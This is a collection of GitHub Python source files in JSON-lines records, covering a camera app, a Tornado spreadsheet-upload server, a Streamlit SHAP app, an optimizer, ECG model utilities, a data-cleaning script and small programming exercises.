self.cam.release()\n        cv2.destroyAllWindows()\n    def close_camera(self):\n        # release the capture device (if one was opened) and close the preview window\n        if hasattr(self, 'cam'):\n            self.cam.release()\n        cv2.destroyAllWindows()\n    \n    def take_pic(self):\n        img_name = \"opencv_frame_{}.png\".format(self.img_counter)\n        cv2.imwrite(img_name,self.frame)\n        self.img_counter+=1\n        print(self.img_counter)\ndef main():\n    app = QApplication(sys.argv)\n    window = MainApp()\n    window.show()\n    app.exec_()\n\nif __name__ == '__main__':\n    main()","repo_name":"AhmadOunabi/Camera","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
{"seq_id":"32871376894","text":"#!/usr/bin/env python\n\nimport datetime, os, random, string\n\nimport tornado.ioloop\nimport tornado.web\nimport convert\n\nimport sys\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\n\nEXT = set(['.xls', '.xlsx']) # accepted extensions\n\nimport sqlite3\ndbconn = sqlite3.connect('products.db')\nif not os.path.exists('uploads'):\n    os.makedirs('uploads')\n    dbconn = convert.setup_tables()\n\ndef reset():\n    # clean database\n    dbconn = convert.setup_tables() # resets database\n    # clean up uploads folder\n    for f in os.listdir('uploads'):\n        path = os.path.join('uploads', f)\n        if os.path.isfile(path):\n            os.unlink(path)\n\ndef buildfilelist(directory):\n    uploads = []\n    for f in os.listdir(directory):\n        (token, ext) = os.path.splitext(f)\n        datestr = str(datetime.datetime.fromtimestamp(os.stat(os.path.join(directory, f)).st_atime))\n        uploads.append((token,datestr))\n    return uploads\n\nclass MainHandler(tornado.web.RequestHandler):\n    def get(self):\n        self.render(\"upload_form\", message=None, uploads=buildfilelist('uploads'))\n\nclass UploadHandler(tornado.web.RequestHandler):\n    def get(self):\n        self.render(\"upload_form\", message=None, uploads=buildfilelist('uploads'))\n\n    def post(self):\n        ofn = '' #original file name\n        ufn = '' #uploaded file name\n        message = ''\n        uploads = buildfilelist('uploads')\n\n        
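# in Tornado, self.request.files maps each form field name to a list of\n        # uploaded files (dicts with 'filename' and 'body')\n        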
if self.request.files.get('uploaded_file'):\n uploaded_file = self.request.files['uploaded_file'][0] #input file\n ofn = uploaded_file['filename'] \n (root, ext) = os.path.splitext(ofn)\n if ext and ext.lower() not in EXT:\n self.render(\"upload_form\", message='unknown file extension', uploads=uploads)\n return\n import_id = ''.join(random.choice(string.ascii_lowercase + string.digits) for x in range(10))\n ufn= import_id + ext \n with open(os.path.join('uploads', ufn), 'w') as output_file:\n output_file.write(uploaded_file.body)\n message = message + 'file uploaded successfully'\n with open(os.path.join ('uploads', ufn), 'rb') as fh:\n convert.import_xls(fh, import_id, dbconn)\n # append the file we just uploaded\n datestr = str(datetime.datetime.fromtimestamp(os.stat(os.path.join('uploads', ufn)).st_atime))\n uploads.append((import_id, datestr))\n headers=convert.get_headers(import_id, dbconn)\n rows=convert.get_import(import_id,dbconn)\n\n self.render(\"upload_form\", message=message, uploads=uploads)\n\nclass ViewHandler(tornado.web.RequestHandler):\n def get(self, token):\n headers=list(convert.get_headers(token, dbconn))\n rows=list(convert.get_import(token,dbconn))\n self.render('view_page', headers=headers, rows=rows)\n\nclass ResetHandler(tornado.web.RequestHandler):\n def get(self):\n reset()\n self.render('reset_page')\n\napplication = tornado.web.Application(\n [\n (r\"/\", UploadHandler),\n (r\"/view/([\\w]+)\", ViewHandler),\n (r\"/reset/\", ResetHandler),\n ],\n debug = True,\n template_path='templates',\n )\n\nif __name__ == \"__main__\":\n port = int(os.environ.get(\"PORT\", 5000))\n application.listen(port)\n tornado.ioloop.IOLoop.instance().start()\n","repo_name":"smallsweet/productify-test","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"13651033593","text":"import streamlit as st\r\nimport pandas as pd\r\nimport pycaret.regression as pr\r\n\r\n\r\n@st.cache(persist=False,\r\n allow_output_mutation=True,\r\n suppress_st_warning=True,\r\n show_spinner=True)\r\ndef load_csv():\r\n df_input = pd.DataFrame()\r\n df_input = pd.read_csv(input, sep=None, engine='python', encoding='utf-8',\r\n parse_dates=True,\r\n infer_datetime_format=True)\r\n return df_input\r\n\r\n\r\nif __name__ == \"__main__\":\r\n st.set_page_config(page_title=\"Python Key Influencers\", page_icon=\"🔍\", layout=\"wide\")\r\n\r\n st.set_option('deprecation.showPyplotGlobalUse', False)\r\n\r\n st.title(\r\n \"Python Key Influencers\"\r\n )\r\n st.subheader(\r\n \"\"\"\r\n A simple XAI (eXplainable Artificial Intelligence) machine learning app inspired by Key Influencers module from Power BI. \r\n \"\"\"\r\n )\r\n with st.expander(\"What's going on?\"):\r\n st.write(\r\n \"\"\"\r\n We are using [*SHAP (SHapley Additive exPlanation)*](https://github.com/slundberg/shap) values, a new fancy game theoretical approach to analise machine learning algorithms such as Gradient Boosted Tree Models like [*LightGBM*](https://lightgbm.readthedocs.io/en/latest/).\r\n \r\n It connects optimal credit allocation with local explanations using the classic Shapley values from game theory and their related extensions.\r\n \r\n \"\"\"\r\n )\r\n\r\n st.markdown('-----')\r\n\r\n st.sidebar.title(\"Menu\")\r\n\r\n st.sidebar.subheader(\"1. 
Upload your .csv\")\r\n\r\n input = st.sidebar.file_uploader(label=\"Note: only .csv\")\r\n\r\n if not input:\r\n st.sidebar.subheader(\"Or you can directly load a Complete Example\")\r\n with st.sidebar.expander(\"Examples\"):\r\n\r\n check1=st.checkbox(\"Ex 1. Price column in Automobile\")\r\n check2=st.checkbox(\"Ex 2. Price in Diamond\")\r\n check3=st.checkbox(\"Ex 3. Strength in Concrete\")\r\n check4=st.checkbox(\"Ex 4. CNT in Bike\")\r\n if check1+check2+check3+check4>1:\r\n st.sidebar.warning(\"Check only one example at time\")\r\n\r\n\r\n if check1:\r\n from pycaret.datasets import get_data\r\n df = get_data('automobile')\r\n with st.expander('Explore data'):\r\n st.dataframe(df.head(10))\r\n with st.spinner(\"Analyzing...\"):\r\n reg = pr.setup(\r\n df,\r\n target='price',\r\n use_gpu=True,\r\n silent=True,\r\n feature_selection=True\r\n )\r\n\r\n lgbm = pr.create_model('lightgbm')\r\n fig = pr.interpret_model(lgbm)\r\n st.text('SHAP analysis of your Data')\r\n st.pyplot(fig)\r\n st.sidebar.success(\"Succesful Analysis\")\r\n if check2:\r\n from pycaret.datasets import get_data\r\n\r\n df = get_data('diamond')\r\n with st.expander('Explore data'):\r\n st.dataframe(df.head(10))\r\n with st.spinner(\"Analyzing...\"):\r\n reg = pr.setup(\r\n df,\r\n target='Price',\r\n use_gpu=True,\r\n silent=True,\r\n feature_selection=True\r\n )\r\n\r\n lgbm = pr.create_model('lightgbm')\r\n fig = pr.interpret_model(lgbm)\r\n st.text('SHAP analysis of your Data')\r\n st.pyplot(fig)\r\n st.sidebar.success(\"Succesful Analysis\")\r\n if check3:\r\n from pycaret.datasets import get_data\r\n\r\n df = get_data('concrete')\r\n with st.expander('Explore data'):\r\n st.dataframe(df.head(10))\r\n with st.spinner(\"Analyzing...\"):\r\n reg = pr.setup(\r\n df,\r\n target='strength',\r\n use_gpu=True,\r\n silent=True,\r\n feature_selection=True\r\n )\r\n\r\n lgbm = pr.create_model('lightgbm')\r\n fig = pr.interpret_model(lgbm)\r\n st.text('SHAP analysis of your Data')\r\n st.pyplot(fig)\r\n st.sidebar.success(\"Succesful Analysis\")\r\n if check4:\r\n from pycaret.datasets import get_data\r\n\r\n df = get_data('bike')\r\n with st.expander('Explore data'):\r\n st.dataframe(df.head(10))\r\n with st.spinner(\"Analyzing...\"):\r\n reg = pr.setup(\r\n df,\r\n target='cnt',\r\n use_gpu=True,\r\n silent=True,\r\n feature_selection=True\r\n )\r\n\r\n lgbm = pr.create_model('lightgbm')\r\n fig = pr.interpret_model(lgbm)\r\n st.text('SHAP analysis of your Data')\r\n st.pyplot(fig)\r\n st.sidebar.success(\"Succesful Analysis\")\r\n if input:\r\n df = load_csv()\r\n with st.expander('Explore data'):\r\n st.dataframe(df.head(10))\r\n columns = list(df.columns)\r\n st.sidebar.subheader(\"2. Select objective column\")\r\n y_column_name = st.sidebar.selectbox(\"Note: only numerical\", index=0, options=sorted(columns),\r\n key=\"Columna Objetivo\")\r\n st.sidebar.subheader(\"3. Begin Analysis\")\r\n if st.sidebar.button('Run'):\r\n with st.spinner(\"Analyzing...\"):\r\n reg = pr.setup(\r\n df,\r\n target=y_column_name,\r\n use_gpu=True,\r\n silent=True,\r\n feature_selection=True\r\n )\r\n\r\n lgbm = pr.create_model('lightgbm')\r\n fig = pr.interpret_model(lgbm)\r\n st.text('SHAP analysis of your Data')\r\n st.pyplot(fig)\r\n st.sidebar.success(\"Succesful Analysis\")\r\n\r\n st.sidebar.header('About')\r\n st.sidebar.success(\r\n \"\"\"\r\n Python Key Influencers app is maintained by \r\n **Roger Pou López** while working as Data Scientist at [**Grupo Vall Companys IT department**](https://www.vallcompanys.es/). 
No property intended. If you like this app please star its\r\n [**GitHub**](https://github.com/rogerpou/Key-Influencers-App)\r\n repo, share it and feel free to open an issue if you find a bug \r\n or if you want some additional features. \r\n \"\"\"\r\n )\r\n","repo_name":"rogerpou/Key-Influencers-App","sub_path":"keyinfluencersapp.py","file_name":"keyinfluencersapp.py","file_ext":"py","file_size_in_byte":6617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"30287623676","text":"# code from https://github.com/gbaydin/hypergradient-descent/blob/master/hypergrad/sgd_hd.py\nimport logging\n\nimport torch\nfrom functools import reduce\nfrom torch.optim.optimizer import Optimizer, required\n\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass HypergradSGD(Optimizer):\n def __init__(self, params, lr=required, momentum=0, dampening=0,\n weight_decay=0, nesterov=False,\n hypergrad_lr=0, hypergrad_momentum=0, min_lr=1e-6):\n if lr is not required and lr < 0.0:\n raise ValueError(\"Invalid learning rate: {}\".format(lr))\n if momentum < 0.0:\n raise ValueError(\"Invalid momentum value: {}\".format(momentum))\n if weight_decay < 0.0:\n raise ValueError(\"Invalid weight_decay value: {}\".format(weight_decay))\n\n defaults = dict(lr=lr, momentum=momentum, dampening=dampening,\n weight_decay=weight_decay, nesterov=nesterov,\n hypergrad_lr=hypergrad_lr, hypergrad_momentum=hypergrad_momentum, min_lr=min_lr)\n if nesterov and (momentum <= 0 or dampening != 0):\n raise ValueError(\"Nesterov momentum requires a momentum and zero dampening\")\n super(HypergradSGD, self).__init__(params, defaults)\n\n for group in self.param_groups:\n group['prev_grads'] = [torch.zeros_like(p, requires_grad=False) for p in group['params']]\n group['lr_per_layers'] = [group['lr'] for p in group['params']]\n\n def __setstate__(self, state):\n super(HypergradSGD, self).__setstate__(state)\n for group in self.param_groups:\n group.setdefault('nesterov', False)\n\n def step(self, closure=None):\n \"\"\"Performs a single optimization step.\n\n Arguments:\n closure (callable, optional): A closure that reevaluates the model\n and returns the loss.\n \"\"\"\n loss = None\n if closure is not None:\n loss = closure()\n\n for group in self.param_groups:\n weight_decay = group['weight_decay']\n momentum = group['momentum']\n dampening = group['dampening']\n nesterov = group['nesterov']\n\n hypergrad_lr = group['hypergrad_lr']\n hypergrad_momentum = group['hypergrad_momentum']\n min_lr = group['min_lr']\n\n lr_per_layers = group['lr_per_layers']\n\n for index, (p, d_p_prev) in enumerate(zip(group['params'], group['prev_grads'])):\n if p.grad is None:\n continue\n\n d_p = p.grad.data\n h = torch.dot(d_p.view(-1), d_p_prev.view(-1))\n # group['prev_grads'][index] = d_p.clone().detach().requires_grad_(False)\n\n if hypergrad_momentum != 0:\n param_state = self.state[p]\n if 'momentum_buffer_h' not in param_state:\n buf_h = param_state['momentum_buffer_h'] = torch.clone(h).detach()\n else:\n buf_h = param_state['momentum_buffer_h']\n buf_h.mul_(hypergrad_momentum).add_(1, h)\n h = buf_h\n\n lr = lr_per_layers[index]\n lr = max(min_lr, lr + (hypergrad_lr * h))\n lr_per_layers[index] = lr\n\n if momentum != 0:\n param_state = self.state[p]\n if 'momentum_buffer' not in param_state:\n buf = param_state['momentum_buffer'] = torch.clone(d_p).detach()\n else:\n buf = param_state['momentum_buffer']\n buf.mul_(momentum).add_(1 - dampening, d_p)\n if nesterov:\n d_p = d_p.add(momentum, buf)\n 
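# without Nesterov, the accumulated momentum buffer itself is the update direction\n                    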
else:\n d_p = buf\n\n group['prev_grads'][index] = d_p.clone().detach().requires_grad_(False)\n p.data.add_(-lr, d_p)\n\n # Apply decoupled weight decay\n if weight_decay != 0:\n p.data.add_(-lr, weight_decay)\n\n group['lr'] = sum(group['lr_per_layers']) / len(group['lr_per_layers'])\n\n return loss\n","repo_name":"wbaek/torchskeleton","sub_path":"skeleton/optim/hypergrads.py","file_name":"hypergrads.py","file_ext":"py","file_size_in_byte":4204,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"7"} +{"seq_id":"32891333914","text":"from typing import List, NamedTuple\n\n\nclass Option(NamedTuple):\n name: str\n values: List[str]\n\n\nclass Kernel(NamedTuple):\n arg_types: List[str]\n return_type: str\n available_options: List[str]\n variadic: str\n\n\nclass FunctionDefinition(object):\n def __init__(\n self,\n name: str,\n uri: str,\n description: str,\n options: List[Option],\n kernels: List[Kernel],\n ):\n self.name = name\n self.uri = uri\n self.description = description\n self.options = options\n self.kernels = kernels\n\n @property\n def details(self):\n return []\n\n @property\n def properties(self):\n return\n\n\nclass FunctionBuilder(object):\n def __init__(self, name: str):\n self.name = name\n self.uri: str = None\n self.description: str = None\n self.options = {}\n self.kernels = []\n\n def set_description(self, description: str):\n self.description = description\n\n def set_uri(self, uri: str):\n self.uri = uri\n\n def try_set_description(self, description: str):\n if self.description is None:\n self.description = description\n\n def note_option(self, name: str, values: List[str]):\n if name in self.options:\n existing_values = self.options[name]\n if existing_values != values:\n raise Exception(\n f\"In the function {self.name} the option {name} had choices {existing_values} but we now encountered choices {values}\"\n )\n else:\n self.options[name] = values\n\n def note_kernel(\n self,\n arg_types: List[str],\n return_type: str,\n available_options: List[str],\n variadic: int,\n ):\n self.kernels.append(Kernel(arg_types, return_type, available_options, variadic))\n\n def finish(self) -> FunctionDefinition:\n if self.description is None:\n self.description = \"Description is missing and would go here\"\n opts = []\n for key, values in self.options.items():\n opts.append(Option(key, values))\n return FunctionDefinition(\n self.name, self.uri, self.description, opts, self.kernels\n )\n\n\nclass LibraryBuilder(object):\n def __init__(self):\n self.functions = {}\n\n def get_function(self, name):\n if name not in self.functions:\n self.functions[name] = FunctionBuilder(name)\n return self.functions[name]\n\n def function_names(self) -> List[str]:\n return sorted(self.functions.keys())\n\n def finish(self) -> List[FunctionDefinition]:\n built_functions = []\n for func_name in sorted(self.functions.keys()):\n built_functions.append(self.functions[func_name].finish())\n return built_functions\n","repo_name":"voltrondata/bft","sub_path":"bft/core/function.py","file_name":"function.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"7"} +{"seq_id":"38470482776","text":"import torch.nn as nn\r\nimport torch\r\nimport numpy as np\r\n\r\n\r\ndef shape_change_conv(input_shape, kernel_size, padding, stride):\r\n out_shape = [0, 0]\r\n # int((H_in + 2*padding - dilation*(kernel_size-1) - 1)/stride + 1)\r\n numerator_0 = (input_shape[0] + 2 * padding[0] - 1 * 
(kernel_size[0] - 1) - 1)\r\n numerator_1 = (input_shape[1] + 2 * padding[1] - 1 * (kernel_size[1] - 1) - 1)\r\n out_shape[0] = int(numerator_0 / stride[0] + 1)\r\n out_shape[1] = int(numerator_1 / stride[1] + 1)\r\n return out_shape\r\n\r\n\r\ndef signal_rescale(signal: np.array, up_slice):\r\n return np.array([subarray[:up_slice] for subarray in signal])\r\n\r\n\r\ndef make_standard_layer(in_channels, out_channels, kernel_size,\r\n padding, stride, LReLU_coef,\r\n pool_kernel_size, pool_padding, pool_stride):\r\n return nn.Sequential(\r\n nn.Conv2d(in_channels=in_channels, out_channels=out_channels,\r\n kernel_size=kernel_size,\r\n padding=padding, stride=stride),\r\n nn.BatchNorm2d(out_channels),\r\n nn.LeakyReLU(LReLU_coef),\r\n nn.MaxPool2d(kernel_size=pool_kernel_size,\r\n padding=pool_padding, stride=pool_stride)\r\n )\r\n\r\n\r\nclass DoublePathLayer(nn.Module):\r\n def __init__(self, layer1, layer2, layerunite, unite='concat'):\r\n super(DoublePathLayer, self).__init__()\r\n assert unite in ['sum', 'concat'], 'unite must be \"sum\" or \"concat\"'\r\n self.layer1 = layer1\r\n self.layer2 = layer2\r\n self.layerunite = layerunite\r\n self.unite = unite\r\n\r\n def forward(self, x):\r\n x1 = self.layer1(x)\r\n x2 = self.layer2(x)\r\n if self.unite == 'sum':\r\n x1 = x1 + x2\r\n elif self.unite == 'concat':\r\n x1 = torch.cat([x1, x2], dim=1)\r\n x1 = self.layerunite(x1)\r\n return x1\r\n\r\n\r\ndef make_standard_double_layer(in_ch=1,\r\n out_ch=2,\r\n kernel_size=(1, 50),\r\n padding=(3, 30),\r\n stride=(2, 4),\r\n dropout_coef=0.5):\r\n return DoublePathLayer(\r\n layer1=nn.Sequential(\r\n nn.Conv2d(in_channels=in_ch, out_channels=out_ch,\r\n kernel_size=kernel_size,\r\n padding=padding, stride=stride),\r\n nn.BatchNorm2d(out_ch),\r\n nn.LeakyReLU(0.1),\r\n nn.Dropout2d(dropout_coef),\r\n nn.Conv2d(in_channels=out_ch, out_channels=out_ch,\r\n kernel_size=(1, 9), padding=(0, 4), stride=(1, 1))\r\n ),\r\n layer2=nn.Sequential(\r\n nn.MaxPool2d(kernel_size=kernel_size, padding=padding, stride=stride),\r\n nn.Conv2d(in_channels=in_ch, out_channels=out_ch,\r\n kernel_size=(1, 1), padding=(0, 0), stride=(1, 1))\r\n ),\r\n layerunite=nn.Sequential(\r\n nn.BatchNorm2d(out_ch * 2),\r\n nn.LeakyReLU(0.1),\r\n nn.Dropout2d(dropout_coef)\r\n ),\r\n unite='concat'\r\n )\r\n","repo_name":"aimclub/ECG","sub_path":"ECG/NN_based_approach/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3098,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"7"} +{"seq_id":"32905386568","text":"# Libraries for data analysis\nimport numpy as np\nfrom sklearn.cluster import DBSCAN\nimport pandas as pd\n\n# Library for data visualization\nimport matplotlib.pyplot as plt\n\n# Library for obtaining user preferences\nimport sys\n\n# Reads utilization data from text file\nfile = open(\"CPU_data-0.txt\", \"r\")\n\nelapsed_time = []\nutilization_data = []\n\n# Stores user preference for viewing data visualization\ngraph_plots = True if len(sys.argv) == 2 else False\n\nif graph_plots:\n fig, ax1 = plt.subplots()\n fig, ax2 = plt.subplots()\n\nline = file.readline()\nwhile len(line) > 0:\n elapsed_time.append(int(line.split()[0]))\n utilization_data.append(float(line.split()[1]))\n line = file.readline()\n \nfile.close()\n\n# Deletes first and last 30 data points to eliminate effects of spikes due to program execution and termination\n\nelapsed_time = elapsed_time[30:]\nelapsed_time = elapsed_time[:-30]\n\nutilization_data = utilization_data[30:]\nutilization_data = 
utilization_data[:-30]\n\n# Plots raw data points\nif graph_plots:\n ax1.plot(elapsed_time, utilization_data)\n ax1.set_xlabel('Time Elapsed (Seconds)')\n ax1.set_ylim(-5, 105)\n ax1.set_ylabel('Resource Utilization (%)')\n\n# ----------------------------------------------------------------------------------------------------\n\n# Stores time values of major spikes in data\nmajor_spikes_time_values = []\n\n# Function for removing minor spikes (small fluctuations) in data for a specified number of rounds\ndef remove_minor_spikes(rounds):\n global utilization_data\n \n # Smoothes data using moving average with window of 10 data points\n \n window_size = 10\n \n smoothed_data = np.zeros_like(utilization_data)\n \n for round in range(rounds):\n # Threshold for detecting spikes\n spike_threshold = np.std(utilization_data)\n \n for i in range(len(utilization_data)):\n # Skip edges where window is not fully available\n if i < window_size//2 or i >= len(utilization_data) - window_size//2:\n smoothed_data[i] = utilization_data[i]\n # Calculate moving average for neighboring data points within threshold\n else: \n neighbors = utilization_data[i - window_size//2: i + window_size//2 + 1]\n \n if np.max(neighbors) - np.min(neighbors) > spike_threshold:\n # If spike detected, skip smoothing for that data point\n smoothed_data[i] = utilization_data[i]\n \n # Adds time values corresponding to major spikes during last round of data smoothing\n if round == rounds - 1:\n major_spikes_time_values.append(i)\n else:\n # Performs moving average for non-spike data points\n smoothed_data[i] = np.mean(neighbors)\n \n utilization_data = np.copy(smoothed_data)\n \n# ----------------------------------------------------------------------------------------------------\n \n# Removes minor fluctuations after 1st layer of data cleaning\nremove_minor_spikes(100)\n\n# ----------------------------------------------------------------------------------------------------\n\nmajor_spikes_boundaries = [major_spikes_time_values[0]]\n\nfor i in range(len(major_spikes_time_values)):\n if i > 0 and major_spikes_time_values[i] - major_spikes_time_values[i - 1] > 1:\n major_spikes_boundaries.append(major_spikes_time_values[i - 1])\n major_spikes_boundaries.append(major_spikes_time_values[i])\n \nmajor_spikes_boundaries.append(major_spikes_time_values[len(major_spikes_time_values) - 1])\n\nfor i in range(len(major_spikes_boundaries) // 2):\n minimum = np.min(utilization_data[major_spikes_boundaries[2 * i] : major_spikes_boundaries[2 * i + 1] + 1])\n \n for time_value in range(major_spikes_boundaries[2 * i], major_spikes_boundaries[2 * i + 1] + 1):\n utilization_data[time_value] = minimum\n\n# General clustering to identify average utilization percentages\n \nstandard_deviation = np.std(utilization_data)\n\naverage_value_transitions = []\n\nfor i in range(5, len(utilization_data) - 5):\n neighbors = utilization_data[i - 5 : i + 5]\n \n if np.max(neighbors) - np.min(neighbors) > standard_deviation:\n average_value_transitions.append(i)\n \ntransition_clusters = [0, average_value_transitions[0]]\n\nfor i in range(len(average_value_transitions)):\n if i > 0 and average_value_transitions[i] - average_value_transitions[i - 1] > 1:\n transition_clusters.append(average_value_transitions[i - 1])\n transition_clusters.append(average_value_transitions[i])\n\ntransition_clusters.append(average_value_transitions[len(average_value_transitions) - 1])\ntransition_clusters.append(len(utilization_data) - 1)\n\nfor i in range(len(transition_clusters) // 
2):\n cluster_with_spikes = utilization_data[transition_clusters[2 * i] : transition_clusters[2 * i + 1] + 1]\n average = np.mean(cluster_with_spikes)\n standard_deviation = np.std(cluster_with_spikes)\n \n cluster_without_spikes = [value for value in cluster_with_spikes if value - average < standard_deviation]\n if len(cluster_without_spikes) > 0:\n average = np.mean(cluster_without_spikes)\n \n for j in range(len(cluster_with_spikes)):\n if cluster_without_spikes.count(cluster_with_spikes[j]) == 0:\n cluster_with_spikes[j] = average\n \n utilization_data[j + transition_clusters[2 * i]] = cluster_with_spikes[j]\n\n# ----------------------------------------------------------------------------------------------------\n\n# Removes minor fluctuations after 2nd layer of data cleaning\nremove_minor_spikes(100)\n\n# ----------------------------------------------------------------------------------------------------\n\nfor i in range(len(transition_clusters) - 1):\n min_data_points_in_cluster = 50\n \n if transition_clusters[i + 1] - transition_clusters[i] >= min_data_points_in_cluster:\n sorted_values = np.sort(utilization_data[transition_clusters[i] : transition_clusters[i + 1] + 1])\n median = np.median(sorted_values)\n quartile_1 = np.median(sorted_values[:len(sorted_values) // 2])\n quartile_3 = np.median(sorted_values[(len(sorted_values) // 2):])\n interquartile_range = quartile_3 - quartile_1\n\n for j in range(transition_clusters[i], transition_clusters[i + 1] + 1):\n if utilization_data[j] > quartile_3 + 1.5 * interquartile_range or utilization_data[j] < quartile_1 - 1.5 * interquartile_range:\n utilization_data[j] = median\n else:\n median = np.median(np.sort(utilization_data[transition_clusters[i] : transition_clusters[i + 1] + 1]))\n \n for j in range(transition_clusters[i], transition_clusters[i + 1] + 1):\n utilization_data[j] = median\n\n# DBSCAN (Density-Based Spatial Clustering of Applications with Noise) clustering to identify insignificant clusters\n\ndbscan = DBSCAN(eps=np.std(utilization_data), min_samples=5)\nlabels = dbscan.fit_predict(np.column_stack((elapsed_time, utilization_data)))\n\ncore_samples_mask = np.zeros_like(dbscan.labels_, dtype=bool)\ncore_samples_mask[dbscan.core_sample_indices_] = True\n \n# Finds time values of jumps in average utilization percentage\ncluster_jumps = []\n\nfor i in range(1, len(labels)):\n if labels[i] != labels[i - 1]:\n cluster_jumps.append(i)\n\n# ----------------------------------------------------------------------------------------------------\n\n# Removes minor fluctuations after 3rd layer of data cleaning\nremove_minor_spikes(10)\n\n# ----------------------------------------------------------------------------------------------------\n\n# Plots cleaned data points\nif graph_plots:\n ax2.plot(elapsed_time, utilization_data)\n ax2.set_xlabel('Time Elapsed (Seconds)')\n ax2.set_ylim(-5, 105)\n ax2.set_ylabel('Resource Utilization (%)')\n\ndf = pd.DataFrame({'List1': elapsed_time, 'List2': utilization_data})\n\ndf.to_excel('sheet_0.xlsx', header=False, index=False)\n\n# Displays graphs of raw and cleaned data\nif graph_plots:\n plt.show()","repo_name":"AnkitRaj2/ISM-AI-Model","sub_path":"data_cleaning.py","file_name":"data_cleaning.py","file_ext":"py","file_size_in_byte":8180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"8656499782","text":"# Each letter in alphabet is a different question\n# Each group of passengers are separated by a blank line in the input file\n# We 
only count an answer if everyone in the group answers yes to the same question.\n\nimport string\nfrom collections import Counter\n\n\ndef create_question_list() -> dict:\n questions = {}\n for letter in string.ascii_lowercase: # Create a dictionary of all possible questions\n questions[letter] = 0\n return questions\n\n\ndef count_questions(line: str, group_questions: dict) -> dict:\n added = []\n for question in range(len(line)):\n if line[question] not in added:\n group_questions[line[question]] += 1\n added.append(line[question])\n return group_questions\n\n\ngroup_questions = create_question_list()\ntotal_answers = create_question_list()\npeople = 0 # Number of people in group\n\nwith open('input.txt') as input_file:\n for line in input_file:\n if line == '\\n': # This is the end of the current group\n for answer, value in group_questions.items():\n if value != people:\n group_questions[answer] = 0\n else:\n group_questions[answer] = 1\n total_answers = Counter(total_answers) + Counter(group_questions)\n print(f\"Current Total: {total_answers}\")\n group_questions = create_question_list() # Reset our question list for the next group\n people = 0\n else:\n line = line.strip()\n people += 1\n group_questions = count_questions(line, group_questions)\n print(group_questions)\n\ntotal = 0\nfor _, amount in total_answers.items():\n total += amount\n\nprint(f\"Total: {total}\")\n","repo_name":"gavinnn101/advent-of-code-2020","sub_path":"day06/problem2.py","file_name":"problem2.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71140495583","text":"# population data\nSTART_YEAR = 1951\n\ndef main():\n # open the USPopulation.txt file\n infile = open(\"USPopulation.txt\", \"r\")\n \n # read the contents of the file\n pop_list = infile.readlines()\n \n # close the file\n infile.close()\n \n # convert the contents to integer and strip \\n\n index = 0\n while index < len(pop_list):\n pop_list[index] = int(pop_list[index].rstrip(\"\\n\"))\n index += 1\n \n annual_change(pop_list)\n \ndef annual_change(pop_list):\n # create an empty list\n ann_change = [0] * (len(pop_list)-1)\n \n index = 0\n \n # calculate the total yearly change\n while index < (len(pop_list)-1):\n ann_change[index] = pop_list[index+1] - pop_list[index]\n index += 1\n \n # calculate the average annual change in population\n total = 0\n for num in ann_change:\n total += num\n average = total / len(ann_change)\n print(\"The average annual change in population during the time period is\", \\\n format(average, \",.2f\"))\n \n # display the year with the greatest increase\n print(\"The year with the greatest increase is\", ann_change.index(max(ann_change)) +\n START_YEAR, \"with an increase of\", max(ann_change))\n print(\"The year with the smallest increase is\", ann_change.index(min(ann_change)) +\n START_YEAR, \"with an increase of\", min(ann_change))\n \n\n# call the main function\nmain() ","repo_name":"tayfunayazma/Starting_Out_with_Python","sub_path":"chapter_07/q09.py","file_name":"q09.py","file_ext":"py","file_size_in_byte":1429,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"7"} +{"seq_id":"20206372610","text":"# partition function handles the work of selecting a pivot element\n# and partitioning the data in the array around the pivot\n# going to return the left partition, the pivot, and the right partition\ndef partition(arr):\n # pick the first element as the pivot element\n 
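# (note: a fixed first-element pivot degrades to O(n^2) on already-sorted\n    # input; a random pivot such as random.choice(arr) is a common alternative)\n    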
pivot = arr[0]\n    left = []\n    right = []\n\n    # iterate through the rest of the array, putting each element in the appropriate bucket\n    for x in arr[1:]:\n        if x <= pivot:\n            left.append(x)\n        else:\n            right.append(x)\n\n    return left, pivot, right\n\n\ndef quicksort(arr):\n    # base case\n    # if the length of the array is 0 or 1, it is already sorted\n    if len(arr) <= 1:\n        return arr\n\n    # how do we get closer to our base case?\n    left, pivot, right = partition(arr)\n\n    return quicksort(left) + [pivot] + quicksort(right)\n\n\narr = [2, 6, 7, 4, 2, 77, 87, -44444, 54, 3]\n\nprint(quicksort(arr))\n","repo_name":"ErikSandvikSEA/guided-algorithms-ii","sub_path":"quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"19093436305","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 7 10:30:40 2019\n\n@author: JungWoo\n\"\"\"\n\n#13.(Lists) Given a list of numbers, find and print the elements that appear in it only once. Such elements should be printed in the order in which they occur in the original list.\n#\n#- Example input: 4 3 5 2 5 1 3 5\n#- Example output: 4 2 1\n#\nx = input().split()\n# walk the list in its original order so the output order matches the spec\nfor i in x:\n    if x.count(i) == 1:\n        print(i, end=\" \")","repo_name":"qwlake/classes","sub_path":"study-django-likelion/session03-python practice/session03_13.py","file_name":"session03_13.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
